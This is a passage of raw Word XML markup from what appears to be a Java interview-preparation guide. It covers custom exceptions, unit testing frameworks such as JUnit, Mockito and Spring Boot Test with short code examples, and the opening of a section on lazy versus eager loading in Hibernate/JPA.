    <w:p w14:paraId="4E823B73"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752F8BA8"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3C0DA6EA" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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How to Use Custom Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C934A6"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Once your custom exceptions are defined, you can throw and catch them like any other exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF5B5BF" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Example of Throwing a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A3A87"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4143A" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1578BDFA"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validateUser(String username) throws InvalidUserInputException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CEF8B"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if (username == null || username.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E8B86"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hrow new InvalidUserInputException("Username cannot be empty");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB8054"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12D6D8AE"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57434D99"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C04BDE0" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Example of Catching a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5054D"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED94D64" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417AB6E4"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UserService userService = new UserService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC72032" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412AF010"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createUser(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27485DBF"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E412A40"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userService.validateUser(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA620"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ystem.out.println("User created successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78380166"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catch (InvalidUserInputException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A95DA"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ystem.out.println("Error: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20737FF9"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0A013AA4"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6C336E7B"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0C225AC6" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Best Practices for Custom Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D011B99"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e descriptive names</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Custom exceptions should have names that clearly describe the error condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C82DD"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rovide meaningful messages</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the messages passed to the exception constructors explain the error in detail, which will be helpful for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8540A8"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e checked exceptions for recoverable conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For errors that the caller can potentially recover from, use checked exceptions (extend Exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E6E35"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e unchecked exceptions for programming errors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For errors that are caused by bugs (like invalid argument passed to a method), use unchecked exceptions (extend RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6C6C9" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3324FD90" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF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ustom exceptions allow you to handle specific error conditions more clearly and meaningfully. By defining custom exceptions, you can ensure that your application behaves more predictably and that your error-handling mechanisms are tailored to your specific business logic or application needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D0F800" w14:textId="47CF5AD0"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BD7907F">
          <v:rect id="_x0000_i2603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB9521" w14:textId="6E0977D1" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="_Toc196308093"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you worked on Unit testing? Which framework have you used in your project</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
    </w:p>
    <w:p w14:paraId="1B4ADE8D" w14:textId="7EFDE207" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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es, unit testing is a critical part of the development process. It helps ensure that individual components of the application work as expected and helps maintain code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22487D66"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Java-based projects, the commonly used frameworks for unit testing include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF890C"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JUnit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533966C7"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JUnit 5</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is widely used in Java projects for unit testing. It provides annotations like @Test, @BeforeEach, @AfterEach, @BeforeAll, and @AfterAll to help with setting up and tearing down tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28BCD4"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t also supports assertions like assertEquals(), assertTrue(), assertFalse(), etc., to validate the behavior of your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0F75F"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4E7EAFA2"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24B590"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void testAdd() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34563BBE"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 xml:space="preserve">    Calculator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EA730"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int result = calc.add(2, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0BAFF"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ssertEquals(5, result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32AB77"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04E8E47A"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Mockito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591D3B0"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Mockito</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mocking framework used to create mock objects for unit testing. It is often used in conjunction with JUnit to mock dependencies and test the unit in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673100E"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ith Mockito, you can mock objects, stub methods, and verify interactions with the mock objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BD283"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0D07B4F3"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Mock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB57B15"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rivate UserService userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FC64B" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A71A37"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jectMocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A58A44"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rivate UserController userController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B64E2F" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E2481A"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF4DDFF"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void testCreateUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F53D3B"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hen(userService.createUser(any(User.class))).thenReturn(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153ABFC0"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oolean result = userController.createUser(new User());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DAEEE4"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ssertTrue(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B458B"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E77BF7C"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Spring Test / Spring Boot Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9D7A8"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ring Boot Test</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is commonly used in Spring applications for integration testing and verifying the interaction between components in a Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3192E"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t includes tools like @SpringBootTest and @MockBean to mock Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79C8AF"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2114CCA6"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BootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FBC583"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lass UserControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4F7D4" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03342D34"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03B6C550"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UserController userController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC41FE" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723C7305"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MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14157BE5"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UserService userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EBFCF" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5123D7"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8DF6D"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void testGetUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770016C9"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hen(userService.getUser(1)).thenReturn(new User(1, "John Doe"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59771414"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User user = userController.getUser(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A353B"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ssertNotNull(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8FCD6"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ssertEquals("John Doe", user.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423886DE"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0D9AC66C"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05BAD390"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4. AssertJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52E2DF"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ssertJ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fluent assertion library that provides more readable and powerful assertions than JUnit alone. It works well with both JUnit and TestNG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6819E"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713766EF"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ssertThat(result).isEqualTo(5).isGreaterThan(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574C52C"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5. TestNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD2DFC"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TestNG</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an alternative to JUnit with more advanced features, such as parallel test execution, dependencies, and groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399DFE8"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t also has its own set of annotations like @Test, @BeforeMethod, and @AfterMethod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012FAC70"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Workflow for Unit Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF70068"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Write Unit Tests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each unit test should focus on a small part of the application logic, typically one method at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD766B4"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Mock Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use mocking frameworks like Mockito to isolate the unit under test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BF353"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ssertions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use assertions to check that the output of the method under test matches the expected values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480296E9"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lastRenderedPageBreak/>
        <w:t>Run Tests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run tests locally during development and via a continuous integration pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266447BB"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Refactor</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After tests pass, refactor the code while ensuring all tests continue to pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702097AA"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Benefits of Unit Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D674095"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arly detection of bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unit tests help identify issues early in the development cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25564A"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Improves Code Quality</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Writing tests encourages developers to write more modular and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C3DA2"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onfidence during Refactoring</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unit tests provide a safety net when refactoring code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F85474A"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nit testing frameworks like JUnit, Mockito, and Spring Boot Test ensure that your code works as expected and is reliable, reducing the chances of introducing errors into production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E0FB9" w14:textId="15CB86B1"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B96DDE5">
          <v:rect id="_x0000_i2604" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBED9B2" w14:textId="2FEAF7ED" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00163EF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="614" w:name="_Toc196308094"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference </w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">azy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">oading and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ager </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>oading</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="614"/>
    </w:p>
    <w:p w14:paraId="4CA57957" w14:textId="2CD35009" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Lazy Loading vs Eager Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CDFF1"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Lazy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eager Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two strategies used in object-relational mapping (ORM) frameworks like Hibernate and JPA for fetching related entities. These strategies define how related entities are loaded from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D227"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Lazy Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A660573"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In lazy loading, related entities are not loaded immediately when the parent entity is loaded. Instead, they are loaded only when they are accessed for the first time (on-demand).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBF11A"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you access a related entity for the first time (e.g., through a getter method), a database query is executed to fetch the related entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D7AF7"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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This can improve performance by avoiding unnecessary database queries if related entities are not accessed. However, it might lead to multiple queries being executed (i.e., "N+1" problem) when multiple entities are involved.</w:t>
      </w:r>
